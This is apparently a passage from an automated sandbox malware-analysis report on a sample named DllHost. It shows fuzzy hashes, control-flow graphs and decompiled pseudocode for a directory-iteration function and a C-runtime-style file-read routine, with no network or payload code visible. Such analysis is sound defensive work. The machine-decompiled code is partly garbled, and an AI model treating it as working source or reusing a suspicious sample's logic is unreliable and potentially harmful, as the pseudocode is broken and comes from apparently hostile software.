                                                                                                                                                              • Instruction ID: cd435422f0dc74b051d1a9d0ebc5c78377822dbbe213fb59bca5410c058dafea
                                                                                                                                                              • Opcode Fuzzy Hash: b1f496622d88609ec7606c5ca2a3dd68933ca8243b7aa4fdcafc7ac4361917bc
                                                                                                                                                              • Instruction Fuzzy Hash: F1619136E08E4286F765BF25E9401A9B7B0EB487ACFC40135EA4D43A95DF3CD48AD760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B7100 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 375COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1364 7ff7191b7100-7ff7191b7136 1365 7ff7191b7138 1364->1365 1366 7ff7191b713b-7ff7191b7192 call 7ff7191ba820 call 7ff7191d09d4 1364->1366 1365->1366 1371 7ff7191b7194-7ff7191b719f 1366->1371 1372 7ff7191b720e-7ff7191b7211 1366->1372 1373 7ff7191b71a1-7ff7191b71ad 1371->1373 1374 7ff7191b7203-7ff7191b720c 1371->1374 1375 7ff7191b7225 1372->1375 1376 7ff7191b7213-7ff7191b7216 1372->1376 1378 7ff7191b71af 1373->1378 1379 7ff7191b71f5-7ff7191b71fa 1373->1379 1380 7ff7191b71b2-7ff7191b71bb 1374->1380 1377 7ff7191b722a-7ff7191b7232 1375->1377 1376->1375 1381 7ff7191b7218-7ff7191b721b 1376->1381 1382 7ff7191b7616-7ff7191b7627 call 7ff7191b3a80 1377->1382 1383 7ff7191b7238 1377->1383 1378->1380 1379->1374 1386 7ff7191b71fc-7ff7191b7201 1379->1386 1384 7ff7191b71c1-7ff7191b71d8 1380->1384 1385 7ff7191b7242-7ff7191b7245 1380->1385 1381->1375 1387 7ff7191b721d-7ff7191b7223 1381->1387 1401 7ff7191b7628-7ff7191b763b call 7ff7191b3a80 1382->1401 1383->1380 1391 7ff7191b71da-7ff7191b71ed 1384->1391 1392 7ff7191b723d call 7ff7191d23d0 1384->1392 1389 7ff7191b7247-7ff7191b7249 1385->1389 1390 7ff7191b724e-7ff7191b7257 1385->1390 1386->1380 1387->1375 1387->1377 1395 7ff7191b75e7-7ff7191b760f call 7ff7191d23b0 1389->1395 1396 7ff7191b7259 1390->1396 1397 7ff7191b725c-7ff7191b72a3 call 7ff7191ba820 call 7ff7191bb4d0 1390->1397 1398 7ff7191b7610-7ff7191b7615 call 7ff7191da5f8 1391->1398 1399 7ff7191b71f3 1391->1399 1392->1385 1396->1397 1397->1401 1413 7ff7191b72a9-7ff7191b72b2 1397->1413 1398->1382 1399->1392 1410 7ff7191b763c-7ff7191b7641 call 7ff7191da5f8 1401->1410 1421 7ff7191b7642-7ff7191b7651 call 7ff7191b3a80 1410->1421 1415 7ff7191b72b4-7ff7191b72cb 1413->1415 1416 7ff7191b72eb-7ff7191b7301 1413->1416 1417 7ff7191b72e6 call 7ff7191d23d0 1415->1417 1418 7ff7191b72cd-7ff7191b72e0 1415->1418 1419 7ff7191b730f-7ff7191b7323 1416->1419 1420 7ff7191b7303-7ff7191b7307 1416->1420 1417->1416 1418->1410 1418->1417 1423 7ff7191b7331-7ff7191b7345 1419->1423 1424 7ff7191b7325-7ff7191b7329 1419->1424 1420->1419 1428 7ff7191b7656-7ff7191b765b call 7ff7191da5f8 1421->1428 1426 7ff7191b738a 1423->1426 1427 7ff7191b7347-7ff7191b7351 1423->1427 1424->1423 1429 7ff7191b7392-7ff7191b739d 1426->1429 1430 7ff7191b7382 1427->1430 1431 7ff7191b7353-7ff7191b736d 1427->1431 1436 7ff7191b765c-7ff7191b7661 call 7ff7191da5f8 1428->1436 1433 7ff7191b7560-7ff7191b756b 1429->1433 1434 7ff7191b73a3-7ff7191b73ec call 7ff7191b9c50 call 7ff7191d09d4 1429->1434 1430->1426 1431->1430 1445 7ff7191b736f-7ff7191b7380 1431->1445 1439 7ff7191b756d-7ff7191b7577 1433->1439 1440 7ff7191b75ab-7ff7191b75ae 1433->1440 1457 7ff7191b73f2-7ff7191b73fd 1434->1457 1458 7ff7191b747c-7ff7191b747f 1434->1458 1451 7ff7191b7662-7ff7191b7696 call 7ff7191b3990 call 7ff7191bb240 1436->1451 1446 7ff7191b75a3 1439->1446 1447 7ff7191b7579-7ff7191b7593 1439->1447 1443 7ff7191b75b0-7ff7191b75ba 1440->1443 1444 7ff7191b75e5 1440->1444 1443->1444 1450 7ff7191b75bc-7ff7191b75d4 1443->1450 1444->1395 1445->1426 1446->1440 1447->1446 1455 7ff7191b7595-7ff7191b759d 1447->1455 1450->1444 1465 7ff7191b75d6-7ff7191b75e4 1450->1465 1489 7ff7191b76a7-7ff7191b76f7 1451->1489 1490 7ff7191b7698-7ff7191b76a6 1451->1490 1455->1446 1463 7ff7191b7471-7ff7191b747a 1457->1463 1464 7ff7191b73ff-7ff7191b740b 1457->1464 1460 7ff7191b7481-7ff7191b7484 1458->1460 1461 7ff7191b7493 1458->1461 1460->1461 1467 7ff7191b7486-7ff7191b7489 1460->1467 1469 7ff7191b7498-7ff7191b74a0 1461->1469 1466 7ff7191b7412-7ff7191b7415 1463->1466 1470 7ff7191b7463-7ff7191b7468 1464->1470 1471 7ff7191b740d 1464->1471 1465->1444 1477 7ff7191b74fe-7ff7191b750a 1466->1477 1478 7ff7191b741b-7ff7191b7436 call 7ff7191b9c50 1466->1478 1467->1461 1473 7ff7191b748b-7ff7191b7491 1467->1473 1469->1421 1475 7ff7191b74a6 1469->1475 1470->1463 1472 7ff7191b746a-7ff7191b746f 1470->1472 1471->1466 1472->1466 1473->1461 1473->1469 1475->1466 1479 7ff7191b7546-7ff7191b754e call 7ff7191b3ea0 1477->1479 1480 7ff7191b750c-7ff7191b7526 1477->1480 1491 7ff7191b7438-7ff7191b7461 1478->1491 1492 7ff7191b74ab-7ff7191b74b8 call 7ff7191bb8a0 1478->1492 1488 7ff7191b7553-7ff7191b7555 1479->1488 1482 7ff7191b7541 call 7ff7191d23d0 1480->1482 1483 7ff7191b7528-7ff7191b753b 1480->1483 1482->1479 1483->1436 1483->1482 1488->1451 1493 7ff7191b755b 1488->1493 1495 7ff7191b74c0-7ff7191b74c4 1491->1495 1492->1495 1493->1429 1495->1477 1497 7ff7191b74c6-7ff7191b74dd 1495->1497 1498 7ff7191b74df-7ff7191b74f2 1497->1498 1499 7ff7191b74f8-7ff7191b74fd call 7ff7191d23d0 1497->1499 1498->1428 1498->1499 1499->1477
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: recursive_directory_iterator::recursive_directory_iterator$status
                                                                                                                                                              • API String ID: 3668304517-199609307
                                                                                                                                                              • Opcode ID: a7c4b51d841fe47c61be7c6a2234add7fdaf849fb2d0926d64a3de8b3d56965a
                                                                                                                                                              • Instruction ID: 145ce773c6ca9118110323ce129e4bd7d9dec30de3cc14606206b37d3b86f5a1
                                                                                                                                                              • Opcode Fuzzy Hash: a7c4b51d841fe47c61be7c6a2234add7fdaf849fb2d0926d64a3de8b3d56965a
                                                                                                                                                              • Instruction Fuzzy Hash: 86F19832A08F8181FA609F25F4443ADA372EB857B8F984531DA5E43A95DF3CD6CAD710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E8A0C Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1502 7ff7191e8a0c-7ff7191e8a32 1503 7ff7191e8a34-7ff7191e8a48 call 7ff7191dc834 call 7ff7191dc854 1502->1503 1504 7ff7191e8a4d-7ff7191e8a51 1502->1504 1522 7ff7191e8e47 1503->1522 1506 7ff7191e8e30-7ff7191e8e3c call 7ff7191dc834 call 7ff7191dc854 1504->1506 1507 7ff7191e8a57-7ff7191e8a5e 1504->1507 1524 7ff7191e8e42 call 7ff7191da5d8 1506->1524 1507->1506 1510 7ff7191e8a64-7ff7191e8a96 1507->1510 1510->1506 1511 7ff7191e8a9c-7ff7191e8aa3 1510->1511 1514 7ff7191e8aa5-7ff7191e8ab7 call 7ff7191dc834 call 7ff7191dc854 1511->1514 1515 7ff7191e8abc-7ff7191e8abf 1511->1515 1514->1524 1520 7ff7191e8ac5-7ff7191e8ac7 1515->1520 1521 7ff7191e8e2c-7ff7191e8e2e 1515->1521 1520->1521 1526 7ff7191e8acd-7ff7191e8ad0 1520->1526 1525 7ff7191e8e4a-7ff7191e8e61 1521->1525 1522->1525 1524->1522 1526->1514 1529 7ff7191e8ad2-7ff7191e8af8 1526->1529 1531 7ff7191e8afa-7ff7191e8afd 1529->1531 1532 7ff7191e8b37-7ff7191e8b3f 1529->1532 1535 7ff7191e8b25-7ff7191e8b32 1531->1535 1536 7ff7191e8aff-7ff7191e8b07 1531->1536 1533 7ff7191e8b41-7ff7191e8b69 call 7ff7191e82bc call 7ff7191e6b28 * 2 1532->1533 1534 7ff7191e8b09-7ff7191e8b20 call 7ff7191dc834 call 7ff7191dc854 call 7ff7191da5d8 1532->1534 1565 7ff7191e8b86-7ff7191e8bb7 call 7ff7191e8ff8 1533->1565 1566 7ff7191e8b6b-7ff7191e8b81 call 7ff7191dc854 call 7ff7191dc834 1533->1566 1563 7ff7191e8cc0 1534->1563 1537 7ff7191e8bbb-7ff7191e8bce 1535->1537 1536->1534 1536->1535 1540 7ff7191e8bd0-7ff7191e8bd8 1537->1540 1541 7ff7191e8c4a-7ff7191e8c54 call 7ff7191f1c3c 1537->1541 1540->1541 1544 7ff7191e8bda-7ff7191e8bdc 1540->1544 1552 7ff7191e8cde 1541->1552 1553 7ff7191e8c5a-7ff7191e8c6f 1541->1553 1544->1541 1550 7ff7191e8bde-7ff7191e8bf5 1544->1550 1550->1541 1555 7ff7191e8bf7-7ff7191e8c03 1550->1555 1561 7ff7191e8ce3-7ff7191e8d03 ReadFile 1552->1561 1553->1552 1557 7ff7191e8c71-7ff7191e8c83 GetConsoleMode 1553->1557 1555->1541 1559 7ff7191e8c05-7ff7191e8c07 1555->1559 1557->1552 1562 7ff7191e8c85-7ff7191e8c8d 1557->1562 1559->1541 1564 7ff7191e8c09-7ff7191e8c21 1559->1564 1567 7ff7191e8df6-7ff7191e8dff GetLastError 1561->1567 1568 7ff7191e8d09-7ff7191e8d11 1561->1568 1562->1561 1571 7ff7191e8c8f-7ff7191e8cb1 ReadConsoleW 1562->1571 1574 7ff7191e8cc3-7ff7191e8ccd call 7ff7191e6b28 1563->1574 1564->1541 1575 7ff7191e8c23-7ff7191e8c2f 1564->1575 1565->1537 1566->1563 1572 7ff7191e8e01-7ff7191e8e17 call 7ff7191dc854 call 7ff7191dc834 1567->1572 1573 7ff7191e8e1c-7ff7191e8e1f 1567->1573 1568->1567 1569 7ff7191e8d17 1568->1569 1577 7ff7191e8d1e-7ff7191e8d33 1569->1577 1579 7ff7191e8cb3 GetLastError 1571->1579 1580 7ff7191e8cd2-7ff7191e8cdc 1571->1580 1572->1563 1584 7ff7191e8e25-7ff7191e8e27 1573->1584 1585 7ff7191e8cb9-7ff7191e8cbb call 7ff7191dc7e4 1573->1585 1574->1525 1575->1541 1583 7ff7191e8c31-7ff7191e8c33 1575->1583 1577->1574 1587 7ff7191e8d35-7ff7191e8d40 1577->1587 1579->1585 1580->1577 1583->1541 1591 7ff7191e8c35-7ff7191e8c45 1583->1591 1584->1574 1585->1563 1594 7ff7191e8d42-7ff7191e8d5b call 7ff7191e8754 1587->1594 1595 7ff7191e8d67-7ff7191e8d6f 1587->1595 1591->1541 1602 7ff7191e8d60-7ff7191e8d62 1594->1602 1598 7ff7191e8de4-7ff7191e8df1 call 7ff7191e84e8 1595->1598 1599 7ff7191e8d71-7ff7191e8d83 1595->1599 1598->1602 1603 7ff7191e8d85 1599->1603 1604 7ff7191e8dd7-7ff7191e8ddf 1599->1604 1602->1574 1606 7ff7191e8d8a-7ff7191e8d91 1603->1606 1604->1574 1607 7ff7191e8d93-7ff7191e8d97 1606->1607 1608 7ff7191e8dcd-7ff7191e8dd1 1606->1608 1609 7ff7191e8db3 1607->1609 1610 7ff7191e8d99-7ff7191e8da0 1607->1610 1608->1604 1612 7ff7191e8db9-7ff7191e8dc9 1609->1612 1610->1609 1611 7ff7191e8da2-7ff7191e8da6 1610->1611 1611->1609 1614 7ff7191e8da8-7ff7191e8db1 1611->1614 1612->1606 1613 7ff7191e8dcb 1612->1613 1613->1604 1614->1612
                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                              			E00007FF77FF7191E8A0C(void* __ebx, signed int __ecx, intOrPtr* __rax, long long __rbx, long long __rdx, long long __r9, char _a8, long long _a16, long long _a24, intOrPtr _a32) {
				void* _v72;
				long long _v80;
				signed int _v88;
				long long _v96;
				void* _v104;
				unsigned long long _v120;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed char _t126;
				char _t140;
				int _t149;
				void* _t150;
				void* _t154;
				char _t166;
				char _t167;
				signed int _t171;
				void* _t194;
				void* _t195;
				void* _t196;
				unsigned int _t198;
				void* _t201;
				long long _t206;
				long long _t242;
				signed long long _t249;
				signed short* _t253;
				intOrPtr* _t255;
				char* _t258;
				intOrPtr _t263;
				signed long long _t276;
				void* _t278;
				unsigned long long _t283;
				void* _t284;
				signed long long _t290;
				unsigned long long _t291;
				signed short* _t293;
				signed short* _t299;
				signed short* _t301;
				unsigned long long _t304;
				signed long long _t305;
				char* _t307;
				char* _t308;
				char* _t309;

				_a24 = __rbx;
				_a16 = __rdx;
				r13d = r8d;
				if (r12d != 0xfffffffe) goto 0x191e8a4d;
				E00007FF77FF7191DC834(__rax);
				 *__rax = 0;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 9;
				goto 0x191e8e47;
				if (__ecx < 0) goto 0x191e8e30;
				_t201 = r12d -  *0x1921bb00; // 0x40
				if (_t201 >= 0) goto 0x191e8e30;
				_t3 = _t283 + 1; // 0x1
				r9d = _t3;
				_v80 = __r9;
				_t289 = __ecx >> 6;
				_v88 = __ecx >> 6;
				_t305 = __ecx + __ecx * 8;
				if ((r9b &  *(0x1921b700 + 0x38 + _t305 * 8)) == 0) goto 0x191e8e30;
				if (r13d - 0x7fffffff <= 0) goto 0x191e8abc;
				E00007FF77FF7191DC834(__ecx);
				 *__ecx = 0;
				_t126 = E00007FF77FF7191DC854(__ecx);
				 *__ecx = 0x16;
				goto 0x191e8e42;
				if (r13d == 0) goto 0x191e8e2c;
				if ((_t126 & 0x00000002) != 0) goto 0x191e8e2c;
				_t206 = __rdx;
				if (_t206 == 0) goto 0x191e8aa5;
				r11d =  *((char*)(0x1921b700 + 0x39 + _t305 * 8));
				_t242 =  *((intOrPtr*)(0x1921b700 + 0x28 + _t305 * 8));
				_v96 = _t242;
				_a8 = r11b;
				if (_t206 == 0) goto 0x191e8b37;
				if (r11d - r9d != r9d) goto 0x191e8b25;
				if ((r9b &  !r13d) != 0) goto 0x191e8b25;
				E00007FF77FF7191DC834(_t242);
				 *_t242 = 0;
				E00007FF77FF7191DC854(_t242);
				 *_t242 = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191e8cc0;
				goto 0x191e8bbb;
				if ((r9b &  !r13d) == 0) goto 0x191e8b09;
				_t194 =  <  ? 4 : r13d >> 1;
				E00007FF77FF7191E82BC(_t242,  *((intOrPtr*)(0x1921b700 + _t289 * 8)));
				_t258 = _t242;
				E00007FF77FF7191E6B28(_t242,  *((intOrPtr*)(0x1921b700 + _t289 * 8)));
				E00007FF77FF7191E6B28(_t242,  *((intOrPtr*)(0x1921b700 + _t289 * 8)));
				_t307 = _t258;
				if (_t258 != 0) goto 0x191e8b86;
				E00007FF77FF7191DC854(_t242);
				 *_t242 = 0xc;
				E00007FF77FF7191DC834(_t242);
				 *_t242 = 8;
				goto 0x191e8cc0;
				r8d = 0x7ff71921b701;
				E00007FF77FF7191E8FF8( *((intOrPtr*)(0x1921b700 + _t289 * 8)), 0x1921b700);
				_t290 = _v88;
				r11b = _a8;
				r9d = 1;
				 *((long long*)( *((intOrPtr*)(0x1921b700 + _t290 * 8)) + 0x30 + _t305 * 8)) = _t242;
				_t263 =  *((intOrPtr*)(0x1921b700 + _t290 * 8));
				_v72 = _t307;
				r10d = 0xa;
				if (( *(_t263 + 0x38 + _t305 * 8) & 0x00000048) == 0) goto 0x191e8c4a;
				_t140 =  *((intOrPtr*)(_t263 + 0x3a + _t305 * 8));
				if (_t140 == r10b) goto 0x191e8c4a;
				if (_t194 == 0) goto 0x191e8c4a;
				 *_t307 = _t140;
				_t195 = _t194 - 1;
				_t308 = _t307 + __r9;
				 *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t290 * 8)) + 0x3a + _t305 * 8)) = r10b;
				if (r11b == 0) goto 0x191e8c4a;
				_t166 =  *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t290 * 8)) + 0x3b + _t305 * 8));
				if (_t166 == r10b) goto 0x191e8c4a;
				if (_t195 == 0) goto 0x191e8c4a;
				 *_t308 = _t166;
				_t309 = _t308 + __r9;
				_t196 = _t195 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t290 * 8)) + 0x3b + _t305 * 8)) = r10b;
				if (r11b != r9b) goto 0x191e8c4a;
				_t167 =  *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t290 * 8)) + 0x3c + _t305 * 8));
				if (_t167 == r10b) goto 0x191e8c4a;
				if (_t196 == 0) goto 0x191e8c4a;
				 *_t309 = _t167;
				 *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t290 * 8)) + 0x3c + _t305 * 8)) = r10b;
				if (E00007FF77FF7191F1C3C(r12d,  *((intOrPtr*)(0x1921b700 + _t290 * 8))) == 0) goto 0x191e8cde;
				_t249 =  *((intOrPtr*)(0x1921b700 + _v88 * 8));
				if ( *((intOrPtr*)(_t249 + 0x38 + _t305 * 8)) - sil >= 0) goto 0x191e8cde;
				if (GetConsoleMode(??, ??) == 0) goto 0x191e8cde;
				if (_a8 != 2) goto 0x191e8ce3;
				_t198 = _t196 - 1 >> 1;
				r8d = _t198;
				_v120 = _t283;
				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0x191e8cd2;
				E00007FF77FF7191DC7E4(GetLastError(), _t249, _t258);
				E00007FF77FF7191E6B28(_t249, _t258);
				goto 0x191e8e4a;
				goto 0x191e8d1e;
				_v80 = sil;
				r8d = _t198;
				_v120 = _t283;
				_t149 = ReadFile(??, ??, ??, ??, ??); // executed
				if (_t149 == 0) goto 0x191e8df6;
				if (_a32 - r13d > 0) goto 0x191e8df6;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _v88 * 8)) + 0x38 + _t305 * 8)) - sil >= 0) goto 0x191e8cc3;
				_t291 = _t278 + _t249 * 2 + _a32;
				if (_a8 == 2) goto 0x191e8d67;
				_t276 = _t309 + __r9;
				_v120 = _t304 >> 1;
				_t150 = E00007FF77FF7191E8754(__ebx, r12d, _t278 + _t249 * 2 + _a32, _t198, _a8 - 2, _t258, _t276, _t278, _t283, _t284, _t291, _a16);
				goto 0x191e8cc3;
				if (_v80 == sil) goto 0x191e8de4;
				_t301 = _v72;
				_t253 = _t301;
				_t299 =  &(_t301[_t291 >> 1]);
				if (_t301 - _t299 >= 0) goto 0x191e8dd7;
				_t171 =  *_t253 & 0x0000ffff;
				if (_t171 == 0x1a) goto 0x191e8dcd;
				if (_t171 != 0xd) goto 0x191e8db3;
				_t293 =  &(_t253[1]);
				if (_t293 - _t299 >= 0) goto 0x191e8db3;
				if ( *_t293 != 0xa) goto 0x191e8db3;
				r8d = 4;
				goto 0x191e8db9;
				r8d = 2;
				 *_t301 = 0xa;
				if (_t253 + _t293 - _t299 < 0) goto 0x191e8d8a;
				goto 0x191e8dd7;
				_t255 =  *((intOrPtr*)(0x1921b700 + _t276 * 8));
				 *(_t255 + 0x38 + _t305 * 8) =  *(_t255 + 0x38 + _t305 * 8) | 0x00000002;
				goto 0x191e8cc3;
				E00007FF77FF7191E84E8(_t150, r12d, _v72,  &(_t301[1]));
				goto 0x191e8d60;
				if (GetLastError() != 5) goto 0x191e8e1c;
				E00007FF77FF7191DC854(_t255);
				 *_t255 = 9;
				_t154 = E00007FF77FF7191DC834(_t255);
				 *_t255 = 5;
				goto 0x191e8cc0;
				if (_t154 != 0x6d) goto 0x191e8cb9;
				goto 0x191e8cc3;
				goto 0x191e8e4a;
				E00007FF77FF7191DC834(_t255);
				 *_t255 = 0xa;
				E00007FF77FF7191DC854(_t255);
				 *_t255 = 9;
				return E00007FF77FF7191DA5D8() | 0xffffffff;
			}














































                                                                                                                                                              0x7ff7191e8a0c
                                                                                                                                                              0x7ff7191e8a11
                                                                                                                                                              0x7ff7191e8a2b
                                                                                                                                                              0x7ff7191e8a32
                                                                                                                                                              0x7ff7191e8a34
                                                                                                                                                              0x7ff7191e8a3b
                                                                                                                                                              0x7ff7191e8a3d
                                                                                                                                                              0x7ff7191e8a42
                                                                                                                                                              0x7ff7191e8a48
                                                                                                                                                              0x7ff7191e8a51
                                                                                                                                                              0x7ff7191e8a57
                                                                                                                                                              0x7ff7191e8a5e
                                                                                                                                                              0x7ff7191e8a67
                                                                                                                                                              0x7ff7191e8a67
                                                                                                                                                              0x7ff7191e8a6e
                                                                                                                                                              0x7ff7191e8a7d
                                                                                                                                                              0x7ff7191e8a81
                                                                                                                                                              0x7ff7191e8a86
                                                                                                                                                              0x7ff7191e8a96
                                                                                                                                                              0x7ff7191e8aa3
                                                                                                                                                              0x7ff7191e8aa5
                                                                                                                                                              0x7ff7191e8aaa
                                                                                                                                                              0x7ff7191e8aac
                                                                                                                                                              0x7ff7191e8ab1
                                                                                                                                                              0x7ff7191e8ab7
                                                                                                                                                              0x7ff7191e8abf
                                                                                                                                                              0x7ff7191e8ac7
                                                                                                                                                              0x7ff7191e8acd
                                                                                                                                                              0x7ff7191e8ad0
                                                                                                                                                              0x7ff7191e8ad2
                                                                                                                                                              0x7ff7191e8adb
                                                                                                                                                              0x7ff7191e8ae3
                                                                                                                                                              0x7ff7191e8aed
                                                                                                                                                              0x7ff7191e8af8
                                                                                                                                                              0x7ff7191e8afd
                                                                                                                                                              0x7ff7191e8b07
                                                                                                                                                              0x7ff7191e8b09
                                                                                                                                                              0x7ff7191e8b0e
                                                                                                                                                              0x7ff7191e8b10
                                                                                                                                                              0x7ff7191e8b15
                                                                                                                                                              0x7ff7191e8b1b
                                                                                                                                                              0x7ff7191e8b20
                                                                                                                                                              0x7ff7191e8b32
                                                                                                                                                              0x7ff7191e8b3f
                                                                                                                                                              0x7ff7191e8b48
                                                                                                                                                              0x7ff7191e8b4d
                                                                                                                                                              0x7ff7191e8b54
                                                                                                                                                              0x7ff7191e8b57
                                                                                                                                                              0x7ff7191e8b5e
                                                                                                                                                              0x7ff7191e8b63
                                                                                                                                                              0x7ff7191e8b69
                                                                                                                                                              0x7ff7191e8b6b
                                                                                                                                                              0x7ff7191e8b70
                                                                                                                                                              0x7ff7191e8b76
                                                                                                                                                              0x7ff7191e8b7b
                                                                                                                                                              0x7ff7191e8b81
                                                                                                                                                              0x7ff7191e8b8b
                                                                                                                                                              0x7ff7191e8b8f
                                                                                                                                                              0x7ff7191e8b94
                                                                                                                                                              0x7ff7191e8ba0
                                                                                                                                                              0x7ff7191e8ba8
                                                                                                                                                              0x7ff7191e8bb2
                                                                                                                                                              0x7ff7191e8bb7
                                                                                                                                                              0x7ff7191e8bc3
                                                                                                                                                              0x7ff7191e8bc8
                                                                                                                                                              0x7ff7191e8bce
                                                                                                                                                              0x7ff7191e8bd0
                                                                                                                                                              0x7ff7191e8bd8
                                                                                                                                                              0x7ff7191e8bdc
                                                                                                                                                              0x7ff7191e8bde
                                                                                                                                                              0x7ff7191e8be1
                                                                                                                                                              0x7ff7191e8be7
                                                                                                                                                              0x7ff7191e8bed
                                                                                                                                                              0x7ff7191e8bf5
                                                                                                                                                              0x7ff7191e8bfb
                                                                                                                                                              0x7ff7191e8c03
                                                                                                                                                              0x7ff7191e8c07
                                                                                                                                                              0x7ff7191e8c09
                                                                                                                                                              0x7ff7191e8c14
                                                                                                                                                              0x7ff7191e8c17
                                                                                                                                                              0x7ff7191e8c19
                                                                                                                                                              0x7ff7191e8c21
                                                                                                                                                              0x7ff7191e8c27
                                                                                                                                                              0x7ff7191e8c2f
                                                                                                                                                              0x7ff7191e8c33
                                                                                                                                                              0x7ff7191e8c35
                                                                                                                                                              0x7ff7191e8c45
                                                                                                                                                              0x7ff7191e8c54
                                                                                                                                                              0x7ff7191e8c66
                                                                                                                                                              0x7ff7191e8c6f
                                                                                                                                                              0x7ff7191e8c83
                                                                                                                                                              0x7ff7191e8c8d
                                                                                                                                                              0x7ff7191e8c9c
                                                                                                                                                              0x7ff7191e8ca1
                                                                                                                                                              0x7ff7191e8ca4
                                                                                                                                                              0x7ff7191e8cb1
                                                                                                                                                              0x7ff7191e8cbb
                                                                                                                                                              0x7ff7191e8cc6
                                                                                                                                                              0x7ff7191e8ccd
                                                                                                                                                              0x7ff7191e8cdc
                                                                                                                                                              0x7ff7191e8cde
                                                                                                                                                              0x7ff7191e8cf0
                                                                                                                                                              0x7ff7191e8cf3
                                                                                                                                                              0x7ff7191e8cfb
                                                                                                                                                              0x7ff7191e8d03
                                                                                                                                                              0x7ff7191e8d11
                                                                                                                                                              0x7ff7191e8d33
                                                                                                                                                              0x7ff7191e8d3d
                                                                                                                                                              0x7ff7191e8d40
                                                                                                                                                              0x7ff7191e8d50
                                                                                                                                                              0x7ff7191e8d56
                                                                                                                                                              0x7ff7191e8d5b
                                                                                                                                                              0x7ff7191e8d62
                                                                                                                                                              0x7ff7191e8d6f
                                                                                                                                                              0x7ff7191e8d71
                                                                                                                                                              0x7ff7191e8d76
                                                                                                                                                              0x7ff7191e8d7c
                                                                                                                                                              0x7ff7191e8d83
                                                                                                                                                              0x7ff7191e8d8a
                                                                                                                                                              0x7ff7191e8d91
                                                                                                                                                              0x7ff7191e8d97
                                                                                                                                                              0x7ff7191e8d99
                                                                                                                                                              0x7ff7191e8da0
                                                                                                                                                              0x7ff7191e8da6
                                                                                                                                                              0x7ff7191e8dab
                                                                                                                                                              0x7ff7191e8db1
                                                                                                                                                              0x7ff7191e8db3
                                                                                                                                                              0x7ff7191e8dbc
                                                                                                                                                              0x7ff7191e8dc9
                                                                                                                                                              0x7ff7191e8dcb
                                                                                                                                                              0x7ff7191e8dcd
                                                                                                                                                              0x7ff7191e8dd1
                                                                                                                                                              0x7ff7191e8ddf
                                                                                                                                                              0x7ff7191e8dec
                                                                                                                                                              0x7ff7191e8df1
                                                                                                                                                              0x7ff7191e8dff
                                                                                                                                                              0x7ff7191e8e01
                                                                                                                                                              0x7ff7191e8e06
                                                                                                                                                              0x7ff7191e8e0c
                                                                                                                                                              0x7ff7191e8e11
                                                                                                                                                              0x7ff7191e8e17
                                                                                                                                                              0x7ff7191e8e1f
                                                                                                                                                              0x7ff7191e8e27
                                                                                                                                                              0x7ff7191e8e2e
                                                                                                                                                              0x7ff7191e8e30
                                                                                                                                                              0x7ff7191e8e35
                                                                                                                                                              0x7ff7191e8e37
                                                                                                                                                              0x7ff7191e8e3c
                                                                                                                                                              0x7ff7191e8e61

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 7d65298988323243bff5a5ad8deacda80ed3290f8eb2ca76a4b7fc4b4f0f433c
                                                                                                                                                              • Instruction ID: be4b045ab7071512b282d938659910cb885c2f87f3705eb2b3edcbe3d928e7bd
